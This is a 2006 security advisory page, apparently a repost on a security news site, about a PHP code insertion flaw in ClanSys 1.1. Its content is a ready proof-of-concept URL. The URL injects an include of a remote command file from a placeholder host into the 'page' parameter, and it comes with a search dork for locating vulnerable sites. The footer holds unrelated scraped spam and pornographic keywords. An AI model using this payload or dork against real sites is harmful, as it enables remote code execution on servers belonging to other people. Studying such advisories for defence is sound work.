about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Clansys <= 1.1 (index.php page) PHP Code Insertion Vulnerability




2006-04-23 Clansys <= 1.1 (index.php page) PHP Code Insertion Vulnerability 
Rated as : Moderate Risk

NukedX Security Advisory Nr 2006-29
ClanSys v1.1 (index.php page) PHP Code Insertion Vulnerability
Method found & Exploit scripted by nukedx
Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
Original advisory: http://www.nukedx.com/?viewdoc=29
Dork: "ClanSys v1.1" 2.400 pages.
Full PoC ->
GET -> http://[victim]/[ClanSysPath]/index.php?page=[PHPCode]
EXAMPLE ->
http://[victim]/[ClanSysPath]/index.php?page=<?include($s);?>&s=http://yourhost.com/cmd.txt?

# nukedx.com [2006-04-23]
securitydot.net - 2006-04-23

Advertising

Copyright 2007, SecurityDot
Mon, 07 Dec 2009 17:44:43 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.sefidb Fideo porn media form linux 2.6. xxx.vidio AOM sexanimefi vidio sex WWW.TAMALS Sani sex.C Fedora Cor website fi RAMBA NUDE Free india www.badjoj Gadis Smu optix view.php WWW.XLXX.C mambo Remo www.topdre FUNK 200 /compo mambo Remo news for c news for c Hot and se 3gp arab s Ewa Crack Data mambo Remo www.786178 Intel& Enigma NetPBM PST WWW AREBSE www.dahei5 CMS is Fre 200 /compo lesbiansex sexey+vied Cumminggir http/; www news for c EXPOLITEDM women macos wwwnoelia. wu bug www.blue f